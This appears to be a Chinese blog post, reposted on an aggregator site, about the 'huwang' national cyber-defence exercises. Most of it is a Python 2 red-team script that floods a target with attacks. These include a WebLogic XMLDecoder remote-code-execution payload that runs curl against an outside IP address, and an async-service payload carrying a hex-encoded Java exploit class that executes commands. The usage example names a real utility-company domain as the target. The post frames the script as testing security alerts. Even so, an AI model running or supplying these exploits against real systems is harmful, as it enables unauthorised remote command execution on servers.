前言
5月份中石油的护网刚刚结束,又即将迎来6月份的护网热潮。趁还没开始,先分享一下内容给大家一起学习。
首先可能还有一些小伙伴还不知道什么是护网,直接引用网上传播的PPT中2018年护网背景介绍的内容来解释。
除了说国家电网全公司动员投入上万人是胡说八道之外,其他属不属实我也不太清楚。
不过能肯定的是2018年只有2家单位没有被攻破,这2家单位是不是真的牢不可破,我们也无从查证,不过网上是这么说的,暂且信他。
2019年的护网,2018年翻番,由原来的41支队伍增加到100支左右;参与单位覆盖范围扩大,关键基础设施单位全部要参与。
所以可以看到各种微信群,QQ群里的招聘信息,日薪从1.5k-12k,时长为1个月-3个月,真的是令人眼红。
据说某乌云大佬听到1W2一天根本看不上,然后去了3W一天的
最关键的是要求及其简单,学生都行!!!
薪资高了,中间商赚差价也爽了,这波热潮结束,安全从业人员薪资估计会涨吧。
截取某PPT中的内容:
文末附上PPT的下载链接。
护网
5月份,应客户要求,写了一篇护网专项方案,因敏感原因,这里简述一下:
因为是提纲,有点乱,当时大致的就是各个部门及各地市公司如何做好防护的一些方案。
演练
在准备阶段,演练过程中,红队采取脚本构造恶意payload,来测试安全设备的告警及安全监控分析人员的响应能力。
python2脚本如下,代码中的字典就不放出了,可自行构造:
- # -*- encoding: utf-8 -*-
-
- import requests
- import datetime
- import time
- import json
- import os
- from optparse import OptionParser
-
- requests.packages.urllib3.disable_warnings()
- requests.adapters.DEFAULT_RETRIES = 0
- succes_count = 0
- fail_count = 0
-
-
- def getip():
- r = requests.get('http://ip.360.cn/IPShare/info',verify=False)
- ip = json.loads(r.content)['ip']
- return ip
-
-
- def geturl(payload):
- global fail_count
- global succes_count
- heads = {
- 'User-Agent':
- 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0'
- }
- try:
- requests.get(url + payload, headers=heads, timeout=3,verify=False)
- succes_count += 1
- except:
- fail_count += 1
-
-
- def attackweblogic():
- global fail_count
- global succes_count
- heads = {
- 'User-Agent':
- 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0'
- }
- data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><object class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/sh</string></void><void index="1"><string>-c</string></void><void index="2"><string>curl http://101.200.127.171/sgccccccccc</string></void></array><void method="start"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>'''
- data2 = '''<?xmlversion="1.0"encoding="utf-8"?><soapenv:Envelopexmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"xmlns:wsa="http://www.w3.org/2005/08/addressing"xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>fff</wsa:Action><wsa:RelatesTo>hello</wsa:RelatesTo><work:WorkContextxmlns:work="http://bea.com/2004/06/soap/workarea/"><java><string><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java><voidclass="weblogic.utils.Hex"method="fromHexString"id="cls"><string>0xcafebabe0000003301280a004b00870a0088008907008a0a0003008b0a004b008c0a008d008e08008f0a002f00900800910a008d00920a009300940a009300950700960a000d00970a001100980a000d009907009a0a0011009b0a002f009c0a002f009d08009e07009f0a001600870a00a000a10a003f00a20a001600a30800a40a001600a50800a60a002f00a70a00a800a90a002700aa0800ab0a00ac00ad0a002f00ae0800af0700b00a002500870700b10800b20a002700b30a002700b40a002700b50800b60a00b700b80800b90700ba0a002f00bb0800bc0a002f00bd0a002f00be0b00bf00c00800c10800c20800c30800c40700c50a003900c60a003900c70a003900c80a00c900ca0800cb0700cc0a003f00b30a003f00cd0a00c900ce0a00cf00d00a00b700d10a00a800d20700d30a004600bb0a00d400d50800d60700d70700d80100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010015284c6a6176612f6c616e672f537472696e673b29560100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01001568747470436f6e6e656374696f6e48616e646c65720100314c7765626c6f6769632f736572766c65742f696e7465726e616c2f48747470436f6e6e656374696f6e48616e646c65723b01000e736572766c65745265717565737401002e4c7765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c657452657175657374496d706c3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000d6578656375746554687265616401001d4c7765626c6f6769632f776f726b2f457865637574655468726561643b01000f736572766c6574526573706f6e736501002f4c7765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c6574526573706f6e7365496d706c3b01000b776f726b4164617074657201001b4c7765626c6f6769632f776f726b2f576f726b416461707465723b010014776562417070536572766c6574436f6e746578740100304c7765626c6f6769632f736572766c65742f696e7465726e616c2f576562417070536572766c6574436f6e746578743b0100047061746801000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000b7072696e745772697465720100154c6a6176612f696f2f5072696e745772697465723b0100057368656c6c0100066465636f64650100025b4201000c5f7072696e7457726974657201000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100046e616d650100056279746573010006656e636f646501000c7072696e745772697465723101000d537461636b4d61705461626c650700d70700ba07008a0700d90700da0700db0700dc0700b107006f01000a457863657074696f6e730700dd01000a536f7572636546696c6501000b586d6c4578702e6a6176610c004c004d0700de0c00df00e001001b7765626c6f6769632f776f726b2f457865637574655468726561640c00e100e20c00e300e40700e50c00e600e701001c436f6e7461696e6572537570706f727450726f7669646572496d706c0c00e800e9010011636f6e6e656374696f6e48616e646c65720c00ea00eb0700ec0c00ed00ee0c00ef00f001002f7765626c6f6769632f736572766c65742f696e7465726e616c2f48747470436f6e6e656374696f6e48616e646c65720c00f100f20c00f300f40c00f500f601002c7765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c657452657175657374496d706c0c00f700f60c00f800e70c00f900fa01000677686f616d690100176a6176612f6c616e672f537472696e674275696c6465720700db0c00fb00fc0c00fd00e70c00fe00ff0100102f7761722f66617669636f6e2e69636f0c010000e7010010676976656d65776c73776172706174680c010101020700d90c010301040c010500540100076f732e6e616d650701060c010701080c010900e701000377696e0100136a6176612f7574696c2f41727261794c6973740100136a6176612f696f2f5072696e74577269746572010001780c004c00540c010a00540c010b004d0104c45043554b64484a354948734b4943416749434167616d4632595335735957356e4c6c4e30636d6c755a7942755957316c4944306749694937436941674943416749477068646d4575624746755a79355464484a70626d63675932316b49443067636d56786457567a6443356e5a58525159584a68625756305a58496f496d4e745a4349704f776f6749434167494342705a69686a6257513950573531624777704948734b4943416749434167494342766458517563484a70626e5273626967696347786c59584e6c49476c756348563049474e7662573168626d516849696b3743694167494341674948304b436941674943416749474a766232786c5957346761584e58615734675053416f616d463259533570627935476157786c4c6e4e6c6347467959585276636b4e6f59584967505430674a79386e4b53412f49475a6862484e6c49446f6764484a315a54734b4943416749434167616d4632595335735957356e4c6c4e30636d6c755a31746449474a7662335137436941674943416749476c6d494368706331647062696b6765776f67494341674943416749474a7662335167505342755a586367616d4632595335735957356e4c6c4e30636d6c755a31746449487367496d4e745a43356c654755694c4341694c324d694c43426a625751676654734b49434167494341676653426c62484e6c4948734b4943416749434167494342696232393049443067626d563349477068646d4575624746755a79355464484a70626d64625853423749434976596d6c754c324a68633267694c4341694c574d694c43426a625751676654734b494341674943416766516f67494341674943427159585a684c6d7868626d637555484a765932567a63304a316157786b5a58496763474967505342755a586367616d4632595335735957356e4c6c427962324e6c63334e4364576c735a4756794b474a76623351704f776f674943416749434277596935795a575270636d566a64455679636d3979553352795a5746744b485279645755704f776f67494341674943427159585a684c6d7868626d637555484a765932567a63794277494430676347497563335268636e516f4b54734b4943416749434167616d4632595335706279354a626e423164464e30636d56686253427062694139494841755a325630535735776458525464484a6c5957306f4b54734b4943416749434167596e6c305a56746449474a315a6941394947356c647942696558526c577a45774d6a52644f776f674943416749434270626e5167624756754944306761573475636d56685a436869645759704f776f67494341674943423361476c735a53416f6247567549434539494330784b534237436941674943416749434167636d567a63473975633255755a3256305433563063485630553352795a5746744b436b7564334a706447556f596e566d4c4341774c4342735a5734704f776f6749434167494341674947786c6269413949476c754c6e4a6c5957516f596e566d4b54734b494341674943416766516f6749434167494342795a584e776232357a5a53356e5a585250645852776458525464484a6c5957306f4b53356d6248567a614367704f776f67494341676653426a5958526a6143416f5258686a5a58423061573975494755704948734b494341674948304b4a54343d07010c0c006e010d0100042e6a73700100106a6176612f6c616e672f537472696e670c004c010e010004244e4f240c010f01020c011001110700dc0c011201130100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c004c01140c011501160c011701180701190c011a00fa01000d2f7761722f646174612e62696e01000c6a6176612f696f2f46696c650c011b011c0c011d011e07011f0c012001210c007701220c0123012401001c6a6176612f696f2f427974654172726179496e70757453747265616d0701250c0126012701000001001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a65637401002d7765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c6574526573706f6e7365496d706c0100197765626c6f6769632f776f726b2f576f726b4164617074657201002e7765626c6f6769632f736572766c65742f696e7465726e616c2f576562417070536572766c6574436f6e7465787401000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b01000e67657443757272656e74576f726b01001d28294c7765626c6f6769632f776f726b2f576f726b416461707465723b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b01000f6a6176612f6c616e672f436c6173730100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b010011676574536572766c65745265717565737401003028294c7765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c657452657175657374496d706c3b01000a676574436f6e7465787401003228294c7765626c6f6769632f736572766c65742f696e7465726e616c2f576562417070536572766c6574436f6e746578743b010012676574536572766c6574526573706f6e736501003128294c7765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c6574526573706f6e7365496d706c3b01000b676574526573706f6e73650100047472696d0100066c656e67746801000328294901000e676574526f6f7454656d7044697201001028294c6a6176612f696f2f46696c653b01000f6765744162736f6c75746550617468010006617070656e6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e674275696c6465723b010008746f537472696e67010010657175616c7349676e6f726543617365010015284c6a6176612f6c616e672f537472696e673b295a01000967657457726974657201001728294c6a6176612f696f2f5072696e745772697465723b01000577726974650100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f776572436173650100077072696e746c6e010005636c6f736501001d7765626c6f6769632f736572766c65742f7574696c732f426173653634010016284c6a6176612f6c616e672f537472696e673b295b42010005285b42295601000a73746172747357697468010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000d6372656174654e657746696c6501000328295a01000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b01001d6f72672f6170616368652f636f6d6d6f6e732f696f2f494f5574696c7301000b746f427974654172726179010019284c6a6176612f696f2f496e70757453747265616d3b295b42010016285b42294c6a6176612f6c616e672f537472696e673b010016676574536572766c65744f757470757453747265616d01003528294c7765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c65744f757470757453747265616d496d706c3b0100317765626c6f6769632f736572766c65742f696e7465726e616c2f536572766c65744f757470757453747265616d496d706c01000b777269746553747265616d010018284c6a6176612f696f2f496e70757453747265616d3b29560021004a004b0000000000020001004c004d0001004e0000002f00010001000000052ab70001b100000002004f0000000600010000000b00500000000c0001000000050051005200000001005300540002004e000004640004001400000220b80002c000034d014e2cb600043a04013a051904b60005b600061207b600089900341904b600051209b6000a3a06190604b6000b19061904b6000cc0000d3a071907b6000eb6000f3a051907b600104ea7001f1904c100119900171904c000113a061906b600124e1906b6000f3a052bc6000d2bb60013b600149a000612154cbb001659b700171905b60018b60019b6001a121bb6001ab6001c3a062b121db6001e99000d2db6001f1906b60020b10436071221b800223a081908c600131908b600231224b60008990006033607bb002559b700263a09bb002759bb001659b700171906b6001a1228b6001ab6001cb700293a0a190a1906b6002a190ab6002b122c3a0b190bb8002d3a0cbb002759bb001659b700171906b6001a122eb6001ab6001cb700293a0d190dbb002f59190cb70030b6002a190db6002b2b1231b6003299001319092b07b60033b90034020057a70045150799002319091235b9003402005719091236b9003402005719092bb90034020057a7002019091237b9003402005719091238b9003402005719092bb90034020057bb0039591909b7003a3a0e190e04b6003b57190eb6003c3a0f190fb6003d57bb001659b700171905b60018b60019b6001a123eb6001ab6001c3a10bb003f591910b70040b6004157190fb60042b800433a111911b800443a12bb0027591910b700293a1319131912b6002a1913b6002b2db60045bb0046591911b70047b600482db6001f1249b60020b100000003004f000000e20038000000100007001100090012000f00130012001400220015002e00160034001700400018004a00190050001a005b001b0062001c0068001d006f0020007d002100800024009c002600a5002700ae002800af002c00b2002d00b9002e00cb002f00ce003200d7003400f4003500fb00360100003801040039010b003b0128003c0136003d013b003f01440040015400410159004201630043016d00440179004601830047018d00480196004c01a1004d01a8004e01af004f01b5005f01d1006001de006201e8006401ef006501fa0066020100670206007302160074021f00760050000000e80017002e0022005500560006004000100057005800070062000d0059005a00060000022000510052000000000220005b005c000100070219005d005e000200090217005f00600003000f02110061006200040012020e006300640005009c01840065005c000600b2016e00660067000700b901670068005c000800d701490069006a000900f4012c006b006c000a0104011c006d005c000b010b0115006e006f000c012800f80070006c000d01a1007f00710072000e01af007100730074000f01d1004f0075005c001001e800380076006f001101ef00310077005c001201fa00260078006c001300790000005c0009ff0053000607007a07007b07007c07007d07007e07007f00001b0d02fc002e07007bfd001e0107007bff0085000e07007a07007b07007c07007d07007e07007f07007b0107007b07008007008107007b0700820700810000241c0083000000040001008400010085000000020086</string></void><voidclass="org.mozilla.classfile.DefiningClassLoader"><voidmethod="defineClass"><string>com.supeream.exploits.XmlExp</string><objectidref="cls"></object><voidmethod="newInstance"><voidmethod="say"id="proc"><string>whoami</string></void></void></void></void></java>]]></string></void></class></string></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>'''
- try:
- requests.post(url + "/wls-wsat/CoordinatorPortType11",
- headers=heads,
- datadata=data,verify=False)
- succes_count += 1
- requests.post(url + "/_async/AsyncResponseService",
- headers=heads,
- data=data2,verify=False)
- succes_count += 1
- except Exception, e:
- print e.message
- fail_count += 1
-
-
- def attack():
- if ltype == 'weblogic':
- while 1:
- if (datetime.datetime.now() - start_time).seconds > int(ltime):
- break
- else:
- attackweblogic()
- else:
- while 1:
- if (datetime.datetime.now() - start_time).seconds > int(ltime):
- break
- else:
- for payload in payloads:
- if (datetime.datetime.now() -
- start_time).seconds < int(ltime):
- geturl(payload)
- else:
- break
-
-
- def main():
- usage = "usage: %prog [options] args"
- parser = OptionParser(usage)
- parser.add_option("--url",
- dest='url',
- help=u"攻击对象,eg:http://192.168.111.1",
- default=180)
- parser.add_option("--time",
- dest='time',
- help=u"攻击时间,单位:秒,默认180s",
- default=180)
- parser.add_option("--type",
- dest='type',
- help=u"攻击类型,可选参数:sqlinject、struts2、dirscan、xss、weblogic")
-
- (options, args) = parser.parse_args()
-
- global url, ltype, ltime, payloads, start_time
- if not options.type or not options.url:
- parser.print_help()
- print 'nexample:python Main.py --url http://www.sh.sgcc.com.cn --type dirscan --time 10'
- exit()
-
- else:
- url = options.url
- ltype = options.type
- ltime = options.time
- start_time = datetime.datetime.now()
- pstart_time = start_time.strftime('%Y-%m-%d %H:%M:%S')
-
- file = './dict/' + ltype + '.dict'
- if not os.path.exists(file):
- print u'请检查攻击类型是否正确!'
- exit()
- payloads = open(file).readlines()
- print u'出口地址:' + getip()
- print u'目标地址:' + url
- print u'攻击类型:' + ltype
- print u'设定时长:' + ltime + 's'
- print u'开始时间:' + pstart_time
- attack()
- print u'结束时间:' + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
- print u'成功次数:', succes_count
- print u'失败次数:', fail_count
-
-
- if __name__ == "__main__":
- main()
从上面的表格中可以看到,安全设备中会存在误报和误判,需要分析人员分析相关数据包来做出最后的判断及根据业务优化相关策略。
后记
演习很苦逼,午觉没得睡,每日10小时工作量,领导还要BBBBBBBBBBBBBBBBBB总结,即将引来护网,估计可能要猝死几个做安全的了吧。
相关内容下载地址:
https://github.com/tangxiaofeng7/Protection-network-information.git (编辑:我爱故事小小网_铜陵站长网)
【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
|